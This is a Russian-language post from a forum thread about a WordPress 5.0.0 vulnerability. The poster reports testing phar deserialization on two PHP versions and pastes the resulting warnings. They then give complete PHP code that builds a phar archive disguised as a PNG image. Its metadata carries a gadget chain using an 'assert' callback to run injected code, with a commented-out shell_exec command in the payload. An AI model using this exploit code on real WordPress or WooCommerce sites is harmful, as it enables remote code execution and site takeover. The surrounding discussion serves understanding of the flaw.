The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Раскрыты детали уязвимости в WordPress 5.0.0"
Версия для распечатки Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Исходное сообщение [ Отслеживать ]
Присылайте удачные настройки в раздел примеров файлов конфигурации на WIKI.opennet.ru.
. "Раскрыты детали уязвимости в WordPress 5.0.0" +/
Сообщение от трурль (?), 21-Фев-19, 15:35 
> 5. скормить файл не патченой версии пыха старше чем 5.3.

С древним денвером ясно,там 5.3.

> ибо выполняться должно
> либо file_exists("phar://путь/к/phar.файлу.не.обязательно.с.расширением.phar....")
> либо file_exists("phar://путь/к/phar.файлу.не.обязательно.с.расширением.phar..../not_found.html")
> А вот
> file_exists("путь/к/phar.файлу.не.обязательно.с.расширением.phar....")
> или
> file_exists("путь/к/phar.файлу.не.обязательно.с.расширением.phar..../not_found.html").
> вернет true или false вообще не заглядывая внутрь архива

А, вон чего я упустил. Теперь на cli наблюдается некое шевеление, но не то, что предполагалось:
>PHP Warning:  Class __PHP_Incomplete_Class has no unserializer in /home/onotole/1/phar_test/phar_probe.php on line 8

(php7.2.15-0ubuntu0.18.04.1)

А вот на впс-ке с центосью (php5.4.16):

>Warning: file_exists(): It is not safe to rely on the system's timezone settings. You are *required* to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone 'UTC' for now, but please set date.timezone to select your timezone. in /var/www/httpdocs/phar_test/teest.php on line 16
>Warning: Class __PHP_Incomplete_Class has no unserializer in /var/www/httpdocs/phar_test/teest.php on line 16)

Что-то все это напоминает вирусы под линукс: половина не собирается, треть не работает, остальные затрахаешься настраивать.
Но ухо востро держать следует, спасибо за подсказку.

---------------------------------------
Картинку со вшитым объектом делал так:

class Requests_Utility_FilteredIterator extends ArrayIterator{
protected $callback;
public function __construct(){
    $this->callback = 'assert';
}
}
class WC_Log_Handler_File{
protected $handles;
public function __construct(){
    $this->handles = new Requests_Utility_FilteredIterator;
    // $this->handles[] = 'die(shell_exec("ls -la"));';
    $this->handles[] = 'die("You are hacked!");';
}
}
function img(){
    ob_start();
    imagepng(imagecreatetruecolor(200, 200));
    return ob_get_clean();
}
$n = 'image.phar';
$p = new Phar($n);
$p->setStub(img().'__HALT_COMPILER();');
$p->setMetadata(new WC_Log_Handler_File);
$p['x'] = '';
rename($n, $n.'.png');

(ссылку потерял, вроде бы от чувака, который первым этот эксплойт в картинкой предложил)

Ответить | Правка | Наверх | Cообщить модератору

Оглавление
Раскрыты детали уязвимости в WordPress 5.0.0, opennews, 20-Фев-19, 14:07  [смотреть все]
Форумы | Темы | Пред. тема | След. тема



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру